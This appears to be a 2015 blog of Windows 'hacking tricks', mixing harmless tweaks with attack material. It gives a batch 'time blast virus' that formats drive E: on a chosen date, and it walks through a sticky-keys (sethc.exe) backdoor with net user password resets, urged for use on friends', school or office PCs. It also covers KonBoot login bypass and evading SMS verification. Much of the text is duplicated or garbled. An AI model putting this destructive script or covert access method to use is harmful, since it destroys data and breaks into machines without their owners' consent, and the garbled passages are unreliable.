Frnds my name is Baru.I wanna give you best trick and tips from prefect hacker's post.it s all tips for only educational base not for crime.if any problem about it so plz comment......... .
More
Saturday, 28 February 2015
Google Talk login
With this trick we can open multi google ac.
Right-click on the desktop
-Select New
Select Shortcut
Right-click on the desktop
-Select New
Select Shortcut
Multiple Yahoo Messenger
Here we are getting to start open multiple Yahooooooo msgngr.
- 1. Go to start - Run -Type regedit - Press Enter
Time Blast virus
It blast on time which you will give in it.Copy Paste The Following
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit
And Save It As Abc.bat
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit
And Save It As Abc.bat
HIDE drive by registry
1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer
2.In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).
3.Modify it's value and set it to 3FFFFFF (Hexadecimal) .
4.Restart the computer.
5.Now when you click on My Computer, no drives will be shown(all gone...).
To enable display of drives in My Computer, simply delete this DWORD item that you created. Restart your computer. All the drives are back again.
2.In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).
3.Modify it's value and set it to 3FFFFFF (Hexadecimal) .
4.Restart the computer.
5.Now when you click on My Computer, no drives will be shown(all gone...).
To enable display of drives in My Computer, simply delete this DWORD item that you created. Restart your computer. All the drives are back again.
RAM FREE TRICK
Open notepad
type FREEMEM=SPACE(64000000)
Save it as ram.vbs
now run the script.
Check MAGIC
CRACK BIOS PASS
HERE IS SIMPL TRICK WHEN WE WANT TO CRACK BIOS PASS.
Open the CPU
Observe the Motherbord
Remove the Silver Battery(3v)
Wait 2 minutes and place the Battery
Restoring a Lost Desktop-
Start
Run
Type a period " . "
Then press Enter
Open the CPU
Observe the Motherbord
Remove the Silver Battery(3v)
Wait 2 minutes and place the Battery
Restoring a Lost Desktop-
Start
Run
Type a period " . "
Then press Enter
USE LOCKED COMMAND PROMPT
WE CAN EASY OPEN COMMAND PROMPT WHILE IT Locked BY USER.
- open notepad
- type www.command.com
- then save as cmd.bat at desktop
- then enter now its open.
- ENJOY
Lock drive by registry
- We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.
- Start & Run and type Regedit to open Registry editor
- Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
- Create a new DWORD value NoViewOnDrive and set its value as
2^
(Alpha Number of Drive Letter-1) where Alpha number are simple counting of
alphabets from A to Z as 1 - 26
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
- To lock more drives, calculate the value of each drive and then set sum of those numbers as value
- To unlock your drive just delete the key from the registry.
FIX CORRUPTED FILE IN WINDOW XP
If windows show that your file is corrupted so you can simply recover it.
1.Load XP cd into cd drive
2. go to Run
3. type sfc/scannow
ok
4. Then copy its lost file frm cd.
1.Load XP cd into cd drive
2. go to Run
3. type sfc/scannow
ok
4. Then copy its lost file frm cd.
New Folders lock
- Consider you want to lock a folder named abc in your E:\, whose path is E:\abc.
- Now open the Notepad and type the following
- [code]ren abc abc.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]
- Where abc is your folder name. Save the text file as loc.bat in the same drive.
- Open another new notepad text file and type the following
- [code]ren abc.{21EC2020-3AEA-1069-A2DD-08002B30309D} abc[/code]
- Save the text file as key.bat in the same drive.
- Steps to lock the folder:
- To lock the abc folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
- To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.
Thursday, 26 February 2015
Increase the speed of ur computer
This can help to speed up your computer .Follow the steps given below :-
1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.
2) Click on the 'Advanced' tab.
3) Under 'Performance', click 'Settings'.
4) Then click the 'Advanced' tab on the button that pops up.
5) Under 'Virtual Memory' at the bottom, click 'Change'.
6) Click the 'Custom Size' button.
7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).
8) Click 'Set', and then exit out of all of the windows.
9) Finally, Restart your computer.
10) You now have a faster computer and 1-2GB of Virtual RAM..!
WI-FI security
Having an open wireless network can be a
security risk as it may allow anyone who is close enough to your router
(e.g. a neighbor or someone war driving) access to your network. To make your home wireless network more secure consider the below suggestions.
Tip: All of the steps below will require access to the router setup, and we also recommend configuring wireless security over a computer with a wired connection to the router if possible.
Downlode youtube downloder
First Step Open Youtube And Copy Video Url.. Like….
http://www.youtube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM
http://www.youtube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM
Second Step
Cut this address http://www.
Cut this address http://www.
Third Step
Type– SS
like
Type– SS
like
ssyoutube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM
Hide IP
Here is some IP hidder website it most useful for you.you can hide your IP and safe from hacker detection.
http://nl.smarthide.com/
http://hideme.be/
http://iphider.org/
https://www.hidemyass.com/
http://nl.smarthide.com/
http://hideme.be/
http://iphider.org/
https://www.hidemyass.com/
Type of virus
Computer Viruses are classified according to their
nature of infection and behavior. Different types of computer virus
classification are given below.
Tuesday, 24 February 2015
Computer
Computer History:
The tool known as “ABACUS” was the age-old tool used by man to count and calculate was designed and developed by Chinese (Asia Minor) nearly 5000 years ago. The abacus may be considered the first computer. This device allowed its users to make computations using a system of sliding beads arranged on a rack. Early shopkeepers used the abacus to keep up with transactions. The use of pencil and paper spread, the abacus lost its importance. Nearly twelve centuries past before the next important advance in computing devices emerged.
Useful DOS Commands
Introduction:Many course material on the Teaching Network may still use the command line operating system called DOS (Disk Operating System). This requires the user to type specific commands at a prompt. You may also need to use this system, for example, when changing your password, and you can enter DOS by choosing 'MS-DOS Prompt' from the Public menu on the taskbar.
Watch Videos On Youtube Without Signing In
Hack youtubeYes
Sometime its annoying when youtube ask you to sign in for your age verification to watch 18+ videos. So i will make it easyfor you by showing you a simple youtube trick to watch adult or 18+ youtube videos without signing In. This trick is 100% working as of 2013. So lets get started.
How To Watch 18+ Youtube Videos Without Logging In ?
1. First get the Url of video you want to watch. As shown below.
http://www.youtube.com/watch?v=4Xkh6j7RMqk
2. Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk
3. Now paste the Video Id in the link given below.
3. Now paste the Video Id in the link given below.
http://www.youtube.com/v/VideoId?fs=1
- Replace VideoId with the Id you copied in Step 2
4. Now the url will become as shown below.
http://www.youtube.com/v/4Xkh6j7RMqk?fs=1
5. Done.
Check WiFi hack or not
If your internet is slower than usual, then you should check if someone has hacked in your WIFI .In this post I’m going to show you two effective way to check this.
The easiest way is by using free utility called Wireless Network Watcher v1.55 .
1) Go to nirsoft.net and download Wireless Network Watcher v1.55.
2) Install it on your pc and start scanning. It scans your wireless network and displays the list of all computers and devices that are currently connected to your network.
For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.
For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.
If you want to check if someone has hacked in your WIFI without installing any software then you should log in your router . If anyone is connected to your network it will be shown in your router security settings. You can log into your router, usually http://192.168.1.1 . You can check your router ip address using command prompt
1) Run command prompt (cmd)
2)type
1) Run command prompt (cmd)
2)type
ipconfig
and press enter
3)ipconfig will list your ip , MAC and default gateway address. You can access to your router settings by typing default gateway address in your web browser.
4)Log in your router and look at the Home Network -> Devices, this shows all IP addresses connected to your network.
Backdoor In A Windows7
As the word says, backdoor is a hidden way to access a place. In terms of computer backdoor means a way to access that system(network, pc or anything)through a unknown, hidden way making use of a vulnerability present in that system. In this article I will tell you a way to access a pc running in windows os even if the system is password protected. But you must have accessed that system before. For this trick you need only less than 5 minutes. For example think that your friendask you to do something in his pc while he is having food. Then apply this trick at that moment. And in future when you get a chance you can access that pc even if you don’t know the password(this trick is for password protected pc). Follow the given steps and you can access any password protected system. Before that be notified with the trick behind it. Whenever you try to login to a password protected pc no other application other than “sethc.exe” can be opened.(just try during login),you can open the application just by tapping shift key for 5 times continuously(try it).
This facility is meant for handicapped people to use the system. So what will happen if we replace sethc with command prompt (cmd)? Yes during login instead of sethc we can open cmd(by tapping shift key times).
And using a a cmd code we can reset the password of the account in which you have to login and you can access without a password.
So follow the given trick and you can access the system (first time you access a pc) without password (in future). If you use the following code you can reset the password easily and without confirming the old password. So you don’t need the old password and only the new password you are wishing to assign.
Type the following code:
Syntax: net user accountname *
See the example:net user administrator *
First time when you use a pc do these:
In windows 7:
1) Go to c:windowssystem32
And using a a cmd code we can reset the password of the account in which you have to login and you can access without a password.
So follow the given trick and you can access the system (first time you access a pc) without password (in future). If you use the following code you can reset the password easily and without confirming the old password. So you don’t need the old password and only the new password you are wishing to assign.
Type the following code:
Syntax: net user accountname *
See the example:net user administrator *
First time when you use a pc do these:
In windows 7:
1) Go to c:windowssystem32
2)Copy cmd.exe to desktop
3) Rename it as sethc.exe
You will get a dialogue box saying that you don’t have rights to move it in to system32 or for replacing sethc.exe the cmd.exe you should follow these sub-steps:
a)Right click on sethc.exe in system32
b)Open properties
3) Rename it as sethc.exe
You will get a dialogue box saying that you don’t have rights to move it in to system32 or for replacing sethc.exe the cmd.exe you should follow these sub-steps:
a)Right click on sethc.exe in system32
b)Open properties
c)Click on advanced in security tab
d)Click on owner
e)Click edit
f)Change owner from “trusted installer” to “administrator”
e)Click edit
f)Change owner from “trusted installer” to “administrator”
g)Click apply
h)Then go to ‘security’ tab in properties
i)Click edit
j)Click on ‘administrator’
h)Then go to ‘security’ tab in properties
i)Click edit
j)Click on ‘administrator’
k)Check the option enabling full control
l)Click on apply
4)Copy and paste the renamed .exe file to system32 again.
That’s all now just tap shift key 5 times and see the magic even at login time.
l)Click on apply
4)Copy and paste the renamed .exe file to system32 again.
That’s all now just tap shift key 5 times and see the magic even at login time.
In windows xp:
Just copy cmd to desktop and rename it as sethc.exe and paste it back in system32. Original sethc will be replaced by new sethc.exe no other permissions required.
After opening cmd by tapping shift keys 5 times type the given code(syntax is given,replace accountname with administrator or accordingly)
Net user accountname *
Just copy cmd to desktop and rename it as sethc.exe and paste it back in system32. Original sethc will be replaced by new sethc.exe no other permissions required.
After opening cmd by tapping shift keys 5 times type the given code(syntax is given,replace accountname with administrator or accordingly)
Net user accountname *
In future for accessing the pc on which you have done the above hack just do the following tap shift key times continuously and cmd opens.just type the below code and you can enter the pc without a password(we have resetted it).
So what to think, just follow the above trick and be ready with a backdoor to access any pc your friends,school’s,office or anywhere when you get an access……….
So what to think, just follow the above trick and be ready with a backdoor to access any pc your friends,school’s,office or anywhere when you get an access……….
Find Ip Address Of A Website Use CMD
In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.
Monday, 23 February 2015
Run command in your pc
Just go start,then click on Run then type any comand below
0) cmd - comand prompt
1) compmgmt.msc - for computer managent
2) devmgmt.msc - device manager
3) regedit - registry editor
4) msconfig - system configuratn utility . . .
5) compmgmt.msc - Computer management
6) devmgmt.msc - Device manager
7) diskmgmt.msc - Disk management
8) dfrg.msc - Disk defrag
9) eventvwr.msc - Event viewer
10) fsmgmt.msc - Shared folders
11) gpedit.msc - Group policies
12) lusrmgr.msc - Local users and groups
13) perfmon.msc - Performance monitor
14) rsop.msc - Resultant set of policies
15) secpol.msc - Local security settings
16) services.msc - Various Services
17) msinfo32 - System Information
18) sysedit - System Edit
19) win.ini - windows loading information(also system.ini)
20) winver _ Shows current version of windows
21) calc - calculator
0) cmd - comand prompt
1) compmgmt.msc - for computer managent
2) devmgmt.msc - device manager
3) regedit - registry editor
4) msconfig - system configuratn utility . . .
5) compmgmt.msc - Computer management
6) devmgmt.msc - Device manager
7) diskmgmt.msc - Disk management
8) dfrg.msc - Disk defrag
9) eventvwr.msc - Event viewer
10) fsmgmt.msc - Shared folders
11) gpedit.msc - Group policies
12) lusrmgr.msc - Local users and groups
13) perfmon.msc - Performance monitor
14) rsop.msc - Resultant set of policies
15) secpol.msc - Local security settings
16) services.msc - Various Services
17) msinfo32 - System Information
18) sysedit - System Edit
19) win.ini - windows loading information(also system.ini)
20) winver _ Shows current version of windows
21) calc - calculator
How can Disable USB port(mannully):
1. Goto run
2. Type 'regedit' without quotes
3. Click on HKEY_LOCAL_MACHINE
4. goto SYSTEM
5. Click on CurrentControlSet
6. Click on services
7. Goto USBSTOR
8. Double click on 'Start' where value
is 3
is 3
9. Now change the value data with 4
10. Now press ok and refresh your
desktop your USB port is disabled,to
enable the usb port replace the value
4 with 3.
desktop your USB port is disabled,to
enable the usb port replace the value
4 with 3.
THE DIFFERENCE BETWEEN CORE I3, CORE I5, CORE I7...
Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of processor resources)
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of processor resources)
Hack windows password by KOnBooT
Hack Win 7, Xp , Vista smile emoticon
Requirements:
Pendrive, KONUSB software
Pendrive, KONUSB software
Step 1
Download KONUSB software. (See the link at the end of the post)
Download KONUSB software. (See the link at the end of the post)
Step 2:
Plug in Pen drive into the PC/ laptop and double click on KONBOOTINSTALL.exe & enter the drive
Plug in Pen drive into the PC/ laptop and double click on KONBOOTINSTALL.exe & enter the drive
Manually hide any file in JPEG
Requirement:
1) A Little Knowledge of commandprompt
2) Winrar must be installed on your system
Steps:
1) Create a new folder in C drive e.g. c:\secretfile
2) Move all the files you want to hide into this folder.
3) Compress all the files to .rar e.g.secretfile.rar
Note: This .rar file should be in thesame directory e.g. c:\secretfile
4) Select the JPEG file you want to use to hide the content (e.g. image.jpg). Put this image file in the same folder i.e. c:\secretfile
5) Now, open command prompt (Go to run and type 'cmd'). Make your working directory c:\secrefile. (When you open Cmd you will get something like C:\documents and settings\userna me (something like that)...
2) Move all the files you want to hide into this folder.
3) Compress all the files to .rar e.g.secretfile.rar
Note: This .rar file should be in thesame directory e.g. c:\secretfile
4) Select the JPEG file you want to use to hide the content (e.g. image.jpg). Put this image file in the same folder i.e. c:\secretfile
5) Now, open command prompt (Go to run and type 'cmd'). Make your working directory c:\secrefile. (When you open Cmd you will get something like C:\documents and settings\userna me (something like that)...
Type cd\ and press enter so that you'll be in the root directory i.e. C:.
Now in front of c:\ type cd secretfile and press enter)
6) Now type without quote: "COPY/ b image.jpg + secretfile.rar resultimage.jpg" - Now, image.jpg is the picture you're using to hide the files, secretfile.rar is the file to be hidden, and resultimage.jpg isthe file that contains both (in other words resultimage.jpg is the final result containing the hidden files.).
7) After you have done this, you will see a file resultimage.jpg in c:\secretfile. Open it and it will show only the picture while the files are hidden
6) Now type without quote: "COPY/ b image.jpg + secretfile.rar resultimage.jpg" - Now, image.jpg is the picture you're using to hide the files, secretfile.rar is the file to be hidden, and resultimage.jpg isthe file that contains both (in other words resultimage.jpg is the final result containing the hidden files.).
7) After you have done this, you will see a file resultimage.jpg in c:\secretfile. Open it and it will show only the picture while the files are hidden
Hide hard disk partition
WE r going to hide our drive and get back.press Win+ R . type diskpart. Step 2 : Type list volume we see all the drives listed here. Let me show my drives in My Computer/This PC Now I have Drives Local Disk (H) and (K) as empty. Let me hide H drive. Step 3 : Type select volume h . Syntax : Select volume drive Letter Step 4 : Now disk is selected and ti hide it type remove letter h. Syntax : remove letter drive_letter thats it. Now check your drives in My Computer/This PC Steps to bring back your drive : Steps 1 to 2 as previous one. Next Type assign letter h Syntax : assign letter Drive_letter You will get back the drive. Note: Meanwhile even after hiding you can also get inside the drive using Run. Go to Win + R and type the drive_letter. enjoy with ti.
WINDOWS recorder blackbox
it s very easy
psr.exe
Paste it in run.........
You will see.......
The BLACK BOX RECORDER OF YOUR COMPUTER..
Sunday, 22 February 2015
Windows XP install in10 minuts
It is very easy way .As We all know that During Formatting a Computer After the
File Copying is Completed then windows Require 39 Minutes Time After Reboot The Below Image Will Appear....
Windows8 speed, optimizing
Windows 8 includes the standard Disk Defragmenter, now named the Optimize Drives tool. To access it, press the Windows key, type Defragment, click Settings, and press Enter. Note that Windows 8 automatically optimizes (defragments) your drive once per week by default. However, if you move a lot of files around, you may want to optimize your drives sooner.
Windows8-build an Applications folder for quick program launching from the Start screen or Desktop in
Here we will Create an Applications folder for quick program launching from the Start screen or Desktop in
First, run File Explorer. Navigate to the Desktop and create a new folder. After you create it, rename it:
First, run File Explorer. Navigate to the Desktop and create a new folder. After you create it, rename it:
. Windows8's bend file Explorer
Windows8 is new in2015 every one wanna it so something here for you about windows8.Windows 8's File Explorer file manager is different from the old Windows Explorer in more than just name. It's gotten a complete makeover, notably by the addition of a Ribbon interface that puts many tasks, features and views in easy reach. Following are my favorite ways to get more out of it.
Kill the lock screen altogether in Windows8
Frnds here a tips for you.i think its better for you.not a fan of the lock screen? There are plenty of people who don't find it useful and would prefer to bypass it so they can just sign into Windows and get straight to work. You won't find a setting to do it. Instead, you'll have to use the Registry Editor.
Lock the lock screen image windows8
If you share a Windows 8 PC with others and don't want them messing with the lock screen image, you can lock it so that it can't be changed. To do it, though, you're going to have to get down and dirty by editing the Registry.
Thursday, 19 February 2015
Speed up windows8
Here some new tips for windows 8 speed .some of the tips here also apply to previous versions of Windows, but Windows 8 has some new tricks up its sleeve. As always, there are trade-offs when using some of the below tricks – there’s no magic “Go Faster” button
Tuesday, 17 February 2015
How to play android game in pc.
Here is a tricks with that we can play android game in our pc.First you gonna need Bluestacks
After running the Bluestacks for the first time,it will start downloading the Database and components which will take few minutes depending upon your internet speed.
After running the Bluestacks for the first time,it will start downloading the Database and components which will take few minutes depending upon your internet speed.
Free Antivirus for Android phone
Frns here is some best antivirus to protect your android phone and tab.As we know that Android operating system,still it is vulnerable to worms,virus and many more.In order to keep your android safe there are so many
Folder lock by notepad
Here we can lock our folder by notepad without any software.it work on win 7/xp.First you need to open up notepad. Go to start, run and type in notepad or go to start, all programs, accesories, notepad.
Sunday, 15 February 2015
How to trace ip address mail sender
log in on your gmail account .If the IP address of John is not available, because he is sending
email using Gmail, how can Elizabeth determine John’s geographic
location? There two options:
How to stop spam in facebook
Step #1 – Create a custom list
In the left navigation of your Facebook home page their is a Friends
option. This section allows you to create a custom friends list.
Hovering over the Friends title will show an option called ‘More’.
Select this option and choose the ‘Create List’ option.
Step #2 – Add to the list
This is where you add the people who you want to be able to dictate
the visibility of their posts. Yo could add every one of your friends,
or the select few who are always the culprits for liking and commenting
on rubbish content. Alternatively, you can break down into family,
workmates, local friends, anything you want.This is also handy for being able to dictate what content you create that you mightn’t want other to see (IE: Those drunken Halloween photos that maybe your boss and nanna shouldn’t probably be made aware of)
Step #3 – Setting permissions
Now you have your list of people, you can choose what interaction you
want to have with them. Select the list, and in the top right corner
there is an option to ‘Manage List’. Select the ‘ Choose Update Types…’
option.
Step #4 – Choosing settings
Now all you have to do is deselect the options you don’t want to see
from these people. To eliminate the spam stuff, deselect the ‘comments
and likes’ option. You can be as brutal as you want here of course, but
remember that deselecting these options mean you will no longer see
anything they like or comment on in your feed anymore – including the
non spam stuff.That’ll take care of a lot of the rubbish from your newsfeed with the exception of sponsored posts and Facebook ads of course, but it’s a good start.
Gmail Tricks to Reduce Spam and Organize Email
Most companies have the option to unsubscribe in the email, but there
are still many that do not. Once you learn these three small hacks to
your Gmail address, you can give out an altered version of your email
that will still come directly to your inbox, but will allow you to
create filters to organize the email any way you like. This allows you
to create infinite variations of your Gmail email address.
If you didn’t already know, Gmail does not consider any extra dots in your account name when processing email. So for example, I could write out my email address as aseem.1234@gmail.com instead of the normal aseem1234@gmail.com.
You can add as many dots as you like in any location and the email will still come to you. This trick usually works the best when signing up on forums or anywhere online because most forms will accept periods as an allowable symbol of a typical email address.
This Gmail hack has been around for a LONG time and most people already know about it. Simply place a “+” after your account name and add a word or words to uniquely identify that email address.
For example, I can change my email address to aseem1234+financial@gmail.com when signing up at any bank, credit union, investment site, etc. Now I can create a filter and have all emails related to my financial activities automatically moved to an appropriate label.
This is much easier than creating a separate filter for each financial institution. There are many times when the sending email address used by a financial institution changes and therefore you have to update your filter. Since your customized Gmail address will never change, you never will need to worry about updating the filter.
The plus hack is very useful, but the downside is that online forms sometimes block it because it’s not considered a normal symbol in email addresses. In that case, use the Dot hack or the Googlemail hack I’m about to mention.
Finally, you can change the last part of your email account to googlemail.com instead of the normal gmail.com! It’s another nifty way to not give out your main email address. Obviously, if someone else already knows these tricks, they can easily figure out your original email address.
So aseem1234@googlemail.com is exactly the same as gmail.com. If you want to keep your account name consistent without all of the dots or plus signs, then you can just use googlemail.com instead.
You might be wondering why this is necessary if you could just create a filter on the sender email address and organize email that way? That method works just fine, but like the financial example I gave above, what if you wanted to give out your email address to some clients of a small business you are running from home?
If you don’t have a separate business email address, you could give out an email like aseem1234+businessname@gmail.com to all your clients and then have those emails automatically filtered to a label created for your business emails. Since you don’t necessarily know the emails of the senders, creating a filter on the customized To address works much better.
These hacks have been around for a long time and if you’ve been using Gmail for many years, it’s probably nothing new. However, if you have recently switched over from Yahoo, Outlook, etc, it’s an extra feature
The Dot Hack
If you didn’t already know, Gmail does not consider any extra dots in your account name when processing email. So for example, I could write out my email address as aseem.1234@gmail.com instead of the normal aseem1234@gmail.com.
You can add as many dots as you like in any location and the email will still come to you. This trick usually works the best when signing up on forums or anywhere online because most forms will accept periods as an allowable symbol of a typical email address.
The Plus Hack
This Gmail hack has been around for a LONG time and most people already know about it. Simply place a “+” after your account name and add a word or words to uniquely identify that email address.
For example, I can change my email address to aseem1234+financial@gmail.com when signing up at any bank, credit union, investment site, etc. Now I can create a filter and have all emails related to my financial activities automatically moved to an appropriate label.
This is much easier than creating a separate filter for each financial institution. There are many times when the sending email address used by a financial institution changes and therefore you have to update your filter. Since your customized Gmail address will never change, you never will need to worry about updating the filter.
The plus hack is very useful, but the downside is that online forms sometimes block it because it’s not considered a normal symbol in email addresses. In that case, use the Dot hack or the Googlemail hack I’m about to mention.
The Googlemail Hack
Finally, you can change the last part of your email account to googlemail.com instead of the normal gmail.com! It’s another nifty way to not give out your main email address. Obviously, if someone else already knows these tricks, they can easily figure out your original email address.
So aseem1234@googlemail.com is exactly the same as gmail.com. If you want to keep your account name consistent without all of the dots or plus signs, then you can just use googlemail.com instead.
You might be wondering why this is necessary if you could just create a filter on the sender email address and organize email that way? That method works just fine, but like the financial example I gave above, what if you wanted to give out your email address to some clients of a small business you are running from home?
If you don’t have a separate business email address, you could give out an email like aseem1234+businessname@gmail.com to all your clients and then have those emails automatically filtered to a label created for your business emails. Since you don’t necessarily know the emails of the senders, creating a filter on the customized To address works much better.
These hacks have been around for a long time and if you’ve been using Gmail for many years, it’s probably nothing new. However, if you have recently switched over from Yahoo, Outlook, etc, it’s an extra feature
shutdown pc by cmd
1 open cmd and type-
shutdown -s -t 9 for shutdown (9 mean any second)
shutdown -a for shutdown stop
2 c:\>shutdown -m \\it -s
Shutdown - This is the command u use to shutdown/restart/etc
-m - It means remote computer.
\\it - This is the computer name which you want to shutdown
-s - You have to enter this command (-s = Shutdown, -r = Restart, -l = Logoff, -a = Abort shutdown)
You can use 'net use' command to see the computer names in your network.
shutdown -s -t 9 for shutdown (9 mean any second)
shutdown -a for shutdown stop
2 c:\>shutdown -m \\it -s
Shutdown - This is the command u use to shutdown/restart/etc
-m - It means remote computer.
\\it - This is the computer name which you want to shutdown
-s - You have to enter this command (-s = Shutdown, -r = Restart, -l = Logoff, -a = Abort shutdown)
You can use 'net use' command to see the computer names in your network.
shutdown computer remotly
Having an ability to shutdown computers remotely is helpful not only for
network administrators who need to turn off workstations at night to
save electric power, for example, but also for home users who have more
than one PC in the network and like to manage them remotely. There are a
number of ways how you can execute network shutdown command, but all of
them have some preconditions.
It's important to remember that you can initiate remote shutdown operation, described in this article, only for Windows PCs available in the local network. To check a list of PCs available in the local network you can open Network (or Network Neighborhood is early Windows) in the Windows Explorer. Also to execute network remote shutdown you should have an administrative access to remote PC. This security limitation prevents unauthorized shutdown of remote computers. |
|
shutdown -?In order to shutdown a remote PC you can run such command: shutdown /s /m \\ComputerNameLets break it down:
Important: As it was mentioned above,
shutdown.exe can have different parameters on different Windows
versions. But parameters syntax also can be different. For example on XP
you have to use '-s' instead of '/s'.
shutdown /s /f /m \\ComputerName /t 60 /c "PC will be tuned off in 60 sec" Method Two: Using Windows Shutdown Utility in UI ModeIf you prefer to use visual interface instead of specifying command-line parameters, you can make network remote shutdown from the visual interface by starting shutdown.exe in a dialog mode. Remote Shutdown Dialog offers less options than available from the command-line, but you can execute all main operations such as remote shutdown and reboot. In order to run shutdown.exe as a dialog, you have to execute following command in the Windows command prompt (Windows Start > click Run > type CMD > enter the command below).shutdown /i
psshutdown -s -c -t 60 -m "PC will be tuned off in 60 sec" |
Find website IP adressing by cmd
Now we starting to get website ip using cmd command its simple trick.Press win+r .using this method instead of pinging the address shows you the fastest connection speed between
servers.open command prompt and type in "tracert" then type in the website for example "tracert www.myweb.com" without these things"".
The second picture shows what comes up
The second picture shows what comes up
Tuesday, 10 February 2015
Monday, 9 February 2015
IP hide by cmd
An Internet Protocol (IP) address is a numerical label used to identify a computer or device within a network. Checking the computer’s IP address is the first step to determine if your computer is properly communicating with your router.
Windows7/8 registry tricks
Everyone knows that we here at AskVG love tweaking and customizing Windows OS. We have shared many Registry tweaks, tips-n-tricks and how-to guides for Windows in past which can be found in our exclusive Windows sections:
Windows XP Tips | Windows Vista Tips | Windows 7 Tips | Windows 8 Tips | How-to Guides
We have posted many tutorials which help you in customizing Windows look-n-feel as well as tweaking Windows functionality
Windows XP Tips | Windows Vista Tips | Windows 7 Tips | Windows 8 Tips | How-to Guides
We have posted many tutorials which help you in customizing Windows look-n-feel as well as tweaking Windows functionality
windows 10 downloade
Download links
Show all
Product key: NKJFK-GPHP7-G8C3J-P6JXR-HQRJR
English (United States)
Editions | Link to download | SHA-1 hash value |
---|---|---|
Editions
Windows 10 Technical Preview (x64)
|
Link to download
Download (3.92 GB)
|
SHA-1 hash value
6A95316728299D95249A29FBEB9676DED23B8BEB
|
Editions
Windows 10 Technical Preview (x86)
|
Link to download
Download (3.01 GB)
|
SHA-1 hash value
1AE10947CC297AE299E1C81F95812EFBB5C84121
|
Antivirus working or not in your window
.Some time we have antivirus but we don't update.then some problem grow up in our system..if your system were to somehow get infected with malware, one of the first things that malicious code does is to try and disable the anti-virus scanner. It may also attempt to modify the HOSTS file, so as to tamper with the anti-virus definition update process. Most popular modern-day anti-virus programs offer real-time protection against potentially malicious software and will throw up a prompt warning you.
Sunday, 8 February 2015
Bypass SMS Verification of Any Website
Any web site of the bypass SMS verification
A site of the bypass SMS verification (apply this bypass trick on any site working fine skip sms verification process)
Now a days, many sites only true for the audience to keep in touch and deny spammers are using sms verification. Facebook, Yahoo, Gmail and other major sites and fake sms verification is used to keep the audience away from the audience. sms
verification system, the security of the website will provide any additional quantity, but sometimes the best method proved to be annoying. I have
A few days ago, I have mine with my mobile number, a check of the account, but after verification sms, I'm constantly daily 15-20 advertising and promotional sms sms verify the process as it is annoying.
I decided to find a way to bypass SMS verification of any website, and hopefully someone will share a trick i GudTricks readers of this mobile phone today can bypass SMS verification of any website.So found their way to work. I hope you find the information.
note: this bypass trick is internationally working you can use this trick any where in the world
see below banner
1) Go to the first http://receive-sms-online.com/
2), then select any of your choice to receive SMS on the number line.
3) After that completion , SMS Verification Enter the number in the text shown in the box and hit or click Verify.
When you're done 4), the number of messages in the inbox immediately after you receive your code. The number selected is the number of clicks to access the Inbox, it goes to the inbox is.
Shared on the site, the number of mobile inbox of the one thing that all of the publicly available from the Internet. So kindly shared a mobile number to your Paypal or sensitive information service have not checked any of the other account.
here are the other online sms verification site to bypass sms or skip sms verification
receive-sms.com/
www.k7.net/
lleida.net/uk/
sms-verification.com/
receive-sms-online.com/
pinger.com/tfw
receivesmsonline.com/freephonenumber/
www.receivesmsonline.com/
www.youtextmessage.com/
www.simser.info
A site of the bypass SMS verification (apply this bypass trick on any site working fine skip sms verification process)
Now a days, many sites only true for the audience to keep in touch and deny spammers are using sms verification. Facebook, Yahoo, Gmail and other major sites and fake sms verification is used to keep the audience away from the audience. sms
verification system, the security of the website will provide any additional quantity, but sometimes the best method proved to be annoying. I have
A few days ago, I have mine with my mobile number, a check of the account, but after verification sms, I'm constantly daily 15-20 advertising and promotional sms sms verify the process as it is annoying.
I decided to find a way to bypass SMS verification of any website, and hopefully someone will share a trick i GudTricks readers of this mobile phone today can bypass SMS verification of any website.So found their way to work. I hope you find the information.
note: this bypass trick is internationally working you can use this trick any where in the world
see below banner
Therefore, before beginning, sms verification system works, clears our mind?
SMS verification helps in the marketing advantage, the quality of the audience getting Providing additional layer of security, keeping spammers away, to make contact with the audience as a web manager for a variety of reasons, the court service. An sms verification of a user in the text box on his / her phone number entered. Mobile number is a unique code that will send a bulk sms service. A user in his / her account number to verify that the next step will be to enter the number of the code.Now, the real trick to bypass SMS verification to any website,?
2), then select any of your choice to receive SMS on the number line.
3) After that completion , SMS Verification Enter the number in the text shown in the box and hit or click Verify.
When you're done 4), the number of messages in the inbox immediately after you receive your code. The number selected is the number of clicks to access the Inbox, it goes to the inbox is.
Shared on the site, the number of mobile inbox of the one thing that all of the publicly available from the Internet. So kindly shared a mobile number to your Paypal or sensitive information service have not checked any of the other account.
